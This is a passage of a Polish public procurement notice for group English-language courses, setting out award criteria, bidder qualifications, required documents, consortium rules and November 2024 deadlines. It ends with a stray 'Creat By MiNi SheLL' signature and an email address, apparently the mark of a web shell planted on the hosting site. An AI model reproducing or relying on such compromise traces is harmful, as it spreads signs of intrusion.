Zamawiający wezwie Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 9.1.1.	Zdolności do występowania w obrocie gospodarczym;<br/>Zamawiający nie precyzuje szczegółowego warunku w tym zakresie.<br/>9.1.2.	Uprawnień do prowadzenia określonej działalności gospodarczej <br/>lub zawodowej, o ile wynika to z odrębnych przepisów;<br/>Zamawiający nie precyzuje szczegółowego warunku w tym zakresie.<br/>9.1.3.	Sytuacji ekonomicznej lub finansowej;<br/>Zamawiający nie precyzuje szczegółowego warunku w tym zakresie.<br/>9.1.4.	Zdolności technicznej lub zawodowej.<br/>Warunek ten zostanie uznany za spełniony, jeżeli wykonawca wykaże, że:<br/>1. Posiada doświadczenie tj. warunek ten zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, usługi polegające na przeprowadzeniu, co najmniej trzech kursów języka angielskiego prowadzonych w formie zajęć grupowych tj. dla minimum 8 osób grupa.<br/>2.	Dysponuje osobami tj. warunek ten zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej dwoma osobami zdolnymi do wykonania zamówienia, które spełniają następujące kryteria:<br/>a) posiadają dyplom ukończenia studiów magisterskich lub wyższych zawodowych na kierunku filologia angielska lub lingwistyka stosowana obejmująca język angielski i przygotowanie pedagogiczne lub<br/>posiadają dyplom ukończenia studiów magisterskich lub wyższych zawodowych ukończonych w kraju, w którym językiem urzędowym jest język angielski i posiada przygotowanie pedagogiczne lub <br/>posiadają dyplom ukończenia nauczycielskiego kolegium języków obcych w specjalności języka angielskiego lub<br/>posiadają świadectwo państwowego nauczycielskiego egzaminu języka angielskiego stopnia I lub II.<br/>b) posiadają doświadczenie w nauczaniu języka angielskiego w formie zajęć grupowych – tj. każda z nich prowadziła zajęcia grupowe z zakresu języka angielskiego w wymiarze nie mniejszym niż 150 godzin lekcyjnych lub zegarowych w latach <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a)	Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy PZP, <br/>o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007r. o ochronie konkurencji i konsumentów, z innym Wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej; Wzór oświadczenia stanowi Załącznik Nr 6 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) dotyczących zdolności technicznej lub zawodowej:<br/>wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich przedmiotu, ilości przeszkolonych osób, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest wstanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy - z wykorzystaniem wzoru określonego w załączniku nr 5 do SWZ, <br/>Jeśli wykonawca składa oświadczenie, zobowiązany jest podać przyczyny braku możliwości uzyskania referencji bądź innych dokumentów wystawionych przez podmiot, na rzecz którego usługi były wykonywane.<br/>Uwaga : Jeżeli wykonawca powołuje się na doświadczenie w realizacji usług, wykonywanych wspólnie z innymi wykonawcami, w/w wykaz, powinien dotyczyć usług, w których wykonaniu wykonawca ten bezpośrednio uczestniczył, a w przypadku świadczeń powtarzających się lub ciągłych, w których wykonywaniu bezpośrednio uczestniczył lub uczestniczy. <br/>b) dotyczących dysponowania osobami zdolnymi do wykonania zamówienia:<br/>wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia wraz z informacjami na temat wykształcenia niezbędnego do wykonania niniejszego zamówienia, doświadczenia (ilość godzin prowadzenia zajęć grupowych z zakresu języka angielskiego), zakresu wykonywanych czynności oraz dysponowania dana osobą. Wzór wykazu stanowi załącznik nr 8 do SWZ. <br/>Ponadto wykonawca zobowiązany do załączenia do wykazy dowodów potwierdzających:<br/>-	wykształcenie – odpowiednie kopie dyplomów lub świadectw.<br/>-	doświadczenie zawodowe – tj. dokumenty lub oświadczenia sporządzone przez podmiot, na rzecz którego wskazana osoba prowadziła zajęcia grupowe, a w tym także oświadczenie wykonawcy jeśli zajęcia te były prowadzone na jego rzecz, z których wynika, ilość godzin w ramach których dana osoba prowadziła zajęcia grupowe z języka angielskiego oraz lata w których zajęcia te były prowadzone.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 16.3.1.	Oświadczenie dotyczącego spełniania warunków udziału w postępowaniu <br/>oraz przesłanek wykluczenia z postępowania o treści zgodniej z Załącznikiem Nr 2 do SWZ, należy wypełnić i podpisać przez osoby(ę) uprawnione(ą) do reprezentowania Wykonawcy. Oświadczenie musi być podpisane przez Podmioty, których dotyczą, tj. Wykonawcę lub Wykonawców wspólnie ubiegających się o udzielenie zamówienia (patrz m.in. pkt 11.1.4. SWZ) lub inne Podmioty (patrz m.in. pkt 11.2.7. SWZ).<br/>16.3.2.	Pełnomocnictwa (jeżeli dotyczy) – dokument, z którego wynika prawo <br/>do podpisania oferty przez osobę(y) uprawnioną(e) do reprezentowania Wykonawcy – zasady podpisania dokumentu wynikają z Rozporządzenia wskazanego pkt 16.15.tiret 2 poniżej.<br/>16.3.3.	Pełnomocnictwa z art. 58 ust. 2 ustawy PZP (jeżeli dotyczy – patrz pkt 11.1. SWZ) – zasady podpisania dokumentu wynikają z Rozporządzenia wskazanego pkt 16.15. tiret 2 poniżej.<br/>16.3.4.	Zobowiązania podmiotu udostępniającego zasoby (jeżeli dotyczy – patrz pkt 11.2. SWZ) – zasady podpisania dokumentu wynikają z Rozporządzenia wskazanego pkt 16.15. tiret 2 poniżej (Wzór zobowiązania stanowi Załącznik Nr 3 do SWZ). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Oferta wspólna (np. Konsorcjum, Spółka cywilna – Wspólnicy)<br/><br/>11.1.1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich <br/>w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>11.1.2.	Pełnomocnictwo ustanawiające Pełnomocnika powinno zawierać m.in.:<br/>11.1.2.1.	jednoznacznie określać postępowanie, do którego się odnosi;<br/>11.1.2.2.	wymieniać wszystkich Wykonawców, którzy wspólnie ubiegają się <br/>o zamówienie;<br/>11.1.2.3.	precyzować zakres umocowania;<br/>11.1.2.4.	upoważniać Pełnomocnika do podejmowania niezbędnych działań związanych z postępowaniem i/lub dokonywania wszelkich czynności prawnych i faktycznych związanych z wykonaniem Umowy w imieniu Wykonawców;<br/>11.1.2.5.	być podpisane przez prawnie pełnomocnych przedstawicieli poszczególnych Wykonawców składających wspólną ofertę, jako potwierdzenie uprawnień przekazanych Pełnomocnikowi;<br/>11.1.3.	Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem, jeżeli załączone pełnomocnictwo nie będzie wskazywało inaczej.<br/>11.1.4.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym mowa w pkt 16.3.1. SWZ, składa osobno każdy <br/>z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy <br/>z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>11.1.5.	Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej o którym mowa w pkt 9.1.4. SWZ, dopuszcza łączne spełnianie <br/>przez Wykonawców niniejszego warunku.<br/>11.1.6.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia są zobowiązani <br/>na wezwanie Zamawiającego o którym mowa w pkt 10.1.SWZ, złożyć dokumenty i oświadczenia o których mowa w pkt 10.2. SWZ przy czym:<br/>a)	dokumenty i oświadczenia o których mowa w pkt 10.2.1. SWZ, składają wspólnie Wykonawcy ubiegający się o zamówienie,<br/>b)	dokumenty i oświadczenia o których mowa w pkt 10.2.2. SWZ składa osobno każdy z Wykonawców ubiegających się o udzielenie zamówienia.<br/>11.1.7.	Wykonawcy ponoszą solidarną odpowiedzialność za wykonanie umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 24.2	Przewiduje się możliwość zmiany postanowień Umowy w przypadku wystąpienia jakiejkolwiek z okoliczności o której mowa w §9 Wzoru Umowy.<br/>24.3	Wszelkie zmiany umowy inne niż wymienione w pkt 24.2. SWZ odbywać się będą zgodnie z zapisem art. 455 ustawy PZP i wymagają dla swojej ważności zachowania formy pisemnej. Zmiany umowy dokonywane są w formie pisemnej (aneks) pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-11-15 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy złożyć za pośrednictwem Platformy e- Zamówienia dostępnej pod adresem https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-11-15 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-12-14</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com